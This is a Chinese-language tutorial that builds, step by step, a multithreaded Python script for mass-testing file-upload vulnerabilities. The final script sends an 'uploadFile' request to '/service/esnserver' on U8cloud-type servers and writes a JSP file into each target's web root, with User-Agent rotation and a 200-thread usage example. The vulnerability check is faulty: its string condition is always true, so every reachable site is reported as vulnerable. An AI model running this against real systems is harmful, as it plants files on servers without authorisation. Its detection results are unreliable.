文件上传漏洞检测脚本编写
一、前言
- 首先,既然是要针对于文件上传写批量检测脚本,那么就得提前考虑这么几个可能存在的信息,正片文章均基于以下内容进行编写:
- 爬虫使用:为了方便的验证poc,常使用爬虫来进行自动化测试
- 传参方式:post型还是get型
- 数据传递:是get型的拼接在url后,还是以post正文的形式存在
- 传参路径:通过什么接口进行上传操作的
- 漏洞验证逻辑:针对该次漏洞验证,写出尽量准确的匹配规则
- 爬虫优化:针对于该次漏洞验证,爬虫的优化策略
- 效率提升:是否使用多线程,文件是否实时写入,以降低内存负荷
二、脚本前期准备
- 一般来说,因为文件上传的内容通常较大,因此都是存在于正文中的,故本文章以post传参的形式来讲解。
1. 决定爬虫框架
- 以下内容都基于提前引入python的
requests
库
既然通过post进行传参,那么就一定涉及到request的post方法的相关使用,基本格式如下
response = requests.post(url, headers="相关header头", data="格式")
因此,就要提前定义好该次漏洞检测的header头内容以及数据传递格式,关于数据传递格式,下面会进行详解,这里暂时只需要关注header头内容。
- 可能会存在但不限于以下内容的检测,可以使用相应的内容来自动化:
-
是否对特定的UA头进行了检测?
- 使用UA头池,从多个UA头中随机选择一个使用
headers_list = [ {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"}, {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0 Safari/537.36'}, {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"}, {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"}, {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"}, ] #使用方法(需引入random库以支持该方式): headers = random.choice(headers_list)
-
是否会检测Cookie值?
- 如果Cookie是固定的,则可以写死在代码中:
session = requests.Session() response = session.post(url, data="数据格式")
- 如果Cookie是变化的,则可以根据相关的api接口来获取,例如此处的通过用户登录接口来获取,获取成功之后即可正常使用。
login_url = 'https://example.com/login' login_data = { 'username': 'your_username', 'password': 'your_password' } response = session.post(login_url, data=login_data)
-
是否指定了Content-Type的值?
-
首先Content-Type字段有3个数据类型,下面一一列出
- JSON 数据请求(如 API 接口传 JSON 数据使用
application/json
):
headers = { 'Content-Type': 'application/json' } data = "数据内容" response = requests.post(url, data=data, headers=headers)
- 表单数据请求(如上传文件使用
multipart/form-data
):
headers = { 'Content-Type': 'multipart/form-data' } data = "数据内容" response = requests.post(url, data=data, headers=headers)
- URL 编码的表单数据(如常见的表单提交,使用
application/x-www-form-urlencoded
):
url = 'https://example.com/submit' headers = { 'Content-Type': 'application/x-www-form-urlencoded' } data = "数据内容" response = requests.post(url, data=data, headers=headers)
-
2. 数据传递方式
- 首先,既然是通过post传递数据,那么我们肯定得先考虑是使用什么格式进行数据传递的,常见的数据格式有3种,分别是
json
形式、data
形式、xml
形式
(1). json格式
-
可以通过request.post的相关参数直接指定
data = { "username":"admin" "password":"admin" } response = requests.post(url, json=data, headers=headers)
(2). data形式
-
可以通过request.post的相关参数直接指定
data = "数据内容" response = requests.post(url, data=data, headers=headers)
(3). xml形式
-
需要结合
Content-Type
来指定xml_data = '''<?xml version="1.0" encoding="UTF-8"?> <request> <field1>value1</field1> <field2>value2</field2> </request>''' headers = { 'Content-Type': 'application/xml' } response = requests.post(url, data=xml_data, headers=headers)
3. 传参路径
-
根据不同的文件上传漏洞,指定不同的路径,这一步很简单
payload = "/service/esnserver" baseurl = "http://xxx.com" url = base_url + payload
三、脚本编写
- 至此,最基本的文件上传漏洞脚本检测形式的前期准备已做好,可以进一步编写相关逻辑了
1. 判断url是否存活
-
可以通过简单的返回包的状态码判断,如果为200,则判断网站能正常访问,否则网站无法访问
initial_response = requests.get(url, headers=headers, proxies=proxies, verify=False, timeout=5) if initial_response.status_code == 200:
2. 减少漏报
-
如果只扫描一次,那么可能存在漏报情况,因此可以多次扫描,通过设置最大扫描次数并循环,以避免漏报
max_retries = 2 #定义重试次数为2 for attempt in range(max_retries + 1): # 尝试次数为最大重试次数+1 initial_response = requests.get(url, headers=headers, proxies=proxies, verify=False, timeout=5) if initial_response.status_code == 200: #进入下一步,判断漏洞是否存在 break else: print(f"{url} 无法访问") break # 不符合响应状态退出循环
3. 判断漏洞是否存在
-
通过该漏洞的返回关键词进行匹配。如下例,如果响应包正常返回,并且存在
"data":true
字符串,则认为存在该漏洞。if response.status_code == 200 and '"data":true': #进行进一步的存在漏洞url的处理,例如保存 print(f"{url} 存在文件上传漏洞!!!!!!!!!!!") else: print(f"{url} 不存在文件上传漏洞")
4. 结果写入文件
-
如果有存在该漏洞的url,则将其保存到一个列表中,后面一起写入文件
vulnerable_urls = [] vulnerable_urls.append(url)
5. 完善poc
- 为了使程序遇到错误时不会意外终止,使用错误捕获机制进行处理
def poc(base_url):
payload = "/service/esnserver" # TODO: 修改待拼接的URL路径
post_payload = {
"invocationInfo": {"ucode": "123", "dataSource": "U8cloud", "lang": "en"},
"method": "uploadFile",
"className": "nc.itf.hr.tools.IFileTrans",
"param": {"p1": "UEsDB...AAAAA=", "p2": "webapps/u8c_web/A7788.jsp"},
"paramType": ["p1:[B", "p2:java.lang.String"]
}
url = base_url + payload
headers_list = [
{"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"},
{'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0 Safari/537.36'},
{"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"},
{"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"},
{"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"},
]
vulnerable_urls = []
for attempt in range(max_retries + 1): # 尝试次数为最大重试次数+1
try:
headers = random.choice(headers_list)
initial_response = requests.get(base_url, headers=headers)
if initial_response.status_code == 200: #检测网站是否能够正常访问
response = requests.post(url, headers=headers, json=post_payload)
# 检查漏洞的条件
if response.status_code == 200 and '"data":true':
print(f"{url} 存在文件上传漏洞!!!!!!!!!!!")
vulnerable_urls.append(url)
break # 成功后退出重试循环
else:
print(f"{url} 不存在文件上传漏洞")
break # 正常响应则退出重试循环
else:
print(f"{url} 无法访问")
break # 不符合响应状态退出循环
except:
pass #不处理任何的错误
四、进阶编写
1. 实时写入
-
为了防止堆积过多的内容在内存中,导致出错时无法写入任何东西到文件中,尝试判断出存在漏洞即写入文件
#从保存到URL列表中,修改为直接向文件写入内容 with open(output_file, 'a') as file: file.write(url + '\n')
2. 完善错误处理
-
为了能够更清晰的判断出错点在哪儿,可以进一步的修改错误捕获机制
max_retries = 2 #定义重试次数为2 for attempt in range(max_retries + 1): # 尝试次数为最大重试次数+1 try: #对漏洞进行判断并处理的逻辑 except requests.Timeout: print(f"{url} 尝试第 {attempt + 1} 次超时") if attempt == max_retries: print(f"{url} 超过最大重试次数,跳过该URL") except requests.RequestException as e: print(f"{url} 发生异常: {e}") break # 出现其他异常时退出重试循环
3. 爬虫优化
考虑到以下情况:
- https协议的url可能存在证书过期的现象而导致的无法访问状态码
- 不同网站,如果不使用代理,则无法访问
- 重试时,爬虫可能进入无限等待的情况
可以进一步在request.post中添加参数进行完善
#添加代理
proxies = {
"http": "http://127.0.0.1:7890",
"https": "http://127.0.0.1:7890"
}
if initial_response.status_code == 200:
response = requests.post(urlpath, headers=headers, json=post_payload, proxies=proxies, verify=False, timeout=5)
.........
4. 自动选择数据格式
-
可以根据指定不同的数据格式,自动选择不同的数据请求进行执行
request_type = "json" # 请求类型,可选择 "json", "data", "get" headers = random.choice(headers_list) initial_response = requests.get(base_url, headers=headers, proxies=proxies, verify=False, timeout=5) if initial_response.status_code == 200: if request_type == "json": response = requests.post(url, headers=headers, json=post_payload, proxies=proxies, verify=False, timeout=5) elif request_type == "data": response = requests.post(url, headers=headers, data=post_payload, proxies=proxies, verify=False, timeout=5) elif request_type == "get": response = requests.get(url, headers=headers, params=post_payload, proxies=proxies, verify=False, timeout=5) # 进一步地检查漏洞的条件 .........
5. 采用多线程
-
使用多线程技术,加快漏洞检测的速度,提高效率
lock = threading.Lock() #线程锁,避免资源冲突 with lock: with open(output_file, 'a') as file: file.write(url + '\n')
6. 交互式操作
(1). 直接读取文件内容
def read_urls_from_file(filename):
try:
with open(filename, 'r') as file:
urls = file.readlines()
return [url.strip() for url in urls]
except FileNotFoundError:
print("文件未找到,请检查文件路径和名称是否正确。")
return []
(2). 通过参数指定
- 使用python的
argparse
库,指定通过cmd命令行,指定参数启动的内容
def main():
urllib3.disable_warnings()
parser = argparse.ArgumentParser(description="通用文件上传漏洞检测")
parser.add_argument('-t', '--threads', type=int, default=5, help="指定线程数(默认: 5)")
parser.add_argument('-f', '--urlfile', type=str, help="包含URL列表的文件路径")
parser.add_argument('-o', '--output', type=str, default='result.txt', help="输出文件名称(默认: result.txt)")
args = parser.parse_args()
num_threads = args.threads
output_file = args.output
urls = read_urls_from_file(args.urlfile) if args.urlfile else []
if urls:
with ThreadPoolExecutor(max_workers=num_threads) as executor:
future_to_url = {executor.submit(poc, url, output_file): url for url in urls}
for future in as_completed(future_to_url):
url = future_to_url[future]
try:
future.result(timeout=10)
except TimeoutError:
print(f"{url} 处理超时,跳过该任务")
except Exception as e:
pass
else:
print("没有找到有效的 URL,程序结束。")
五、最终成品
import random
import requests
import urllib3
from concurrent.futures import ThreadPoolExecutor, as_completed
import threading
import argparse
lock = threading.Lock()
max_retries=2 #最大超时重试次数
# 固定参数,直接在此处修改
payload = "/service/esnserver" # TODO: 修改待拼接的URL路径
post_payload = {
"invocationInfo": {"ucode": "123", "dataSource": "U8cloud", "lang": "en"},
"method": "uploadFile",
"className": "nc.itf.hr.tools.IFileTrans",
"param": {"p1": "UEsDB...AAAAA=", "p2": "webapps/u8c_web/A7788.jsp"},
"paramType": ["p1:[B", "p2:java.lang.String"]
} # TODO: 修改POST请求的正文内容
request_type = "json" # 请求类型,可选择 "json", "data", "get"
# 指定代理地址
proxies = {
"http": "http://127.0.0.1:7890",
"https": "http://127.0.0.1:7890"
}
def poc(url, output_file):
urlpath = url + payload
headers_list = [
{"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"},
{'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0 Safari/537.36'},
{"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"},
{"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"},
{"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"},
]
for attempt in range(max_retries + 1): # 尝试次数为最大重试次数+1
try:
headers = random.choice(headers_list)
initial_response = requests.get(url, headers=headers, proxies=proxies, verify=False, timeout=5)
if initial_response.status_code == 200:
if request_type == "json":
response = requests.post(urlpath, headers=headers, json=post_payload, proxies=proxies, verify=False, timeout=5)
elif request_type == "data":
response = requests.post(urlpath, headers=headers, data=post_payload, proxies=proxies, verify=False, timeout=5)
elif request_type == "get":
response = requests.get(urlpath, headers=headers, params=post_payload, proxies=proxies, verify=False, timeout=5)
# 检查漏洞的条件
if response.status_code == 200 and '"data":true':
print(f"{url} 存在文件上传漏洞!!!!!!!!!!!")
with lock:
with open(output_file, 'a') as file:
file.write(url + '\n')
break # 成功后退出重试循环
else:
print(f"{url} 不存在文件上传漏洞")
break # 正常响应则退出重试循环
else:
print(f"{url} 无法访问")
break # 不符合响应状态退出循环
except requests.Timeout:
print(f"{url} 尝试第 {attempt + 1} 次超时")
if attempt == max_retries:
print(f"{url} 超过最大重试次数,跳过该URL")
except requests.RequestException as e:
print(f"{url} 发生异常: {e}")
break # 出现其他异常时退出重试循环
def read_urls_from_file(filename):
try:
with open(filename, 'r') as file:
urls = file.readlines()
return [url.strip() for url in urls]
except FileNotFoundError:
print("文件未找到,请检查文件路径和名称是否正确。")
return []
def main():
urllib3.disable_warnings()
parser = argparse.ArgumentParser(description="通用文件上传漏洞检测")
parser.add_argument('-t', '--threads', type=int, default=5, help="指定线程数(默认: 5)")
parser.add_argument('-f', '--urlfile', type=str, help="包含URL列表的文件路径")
parser.add_argument('-o', '--output', type=str, default='result.txt', help="输出文件名称(默认: result.txt)")
args = parser.parse_args()
num_threads = args.threads
output_file = args.output
urls = read_urls_from_file(args.urlfile) if args.urlfile else []
if urls:
with ThreadPoolExecutor(max_workers=num_threads) as executor:
future_to_url = {executor.submit(poc, url, output_file): url for url in urls}
for future in as_completed(future_to_url):
url = future_to_url[future]
try:
future.result(timeout=10)
except TimeoutError:
print(f"{url} 处理超时,跳过该任务")
except Exception as e:
pass
else:
print("没有找到有效的 URL,程序结束。")
if __name__ == '__main__':
main()
六、使用方法
#通过命令行启动该脚本
python file_upload.py -f urls.txt -t 200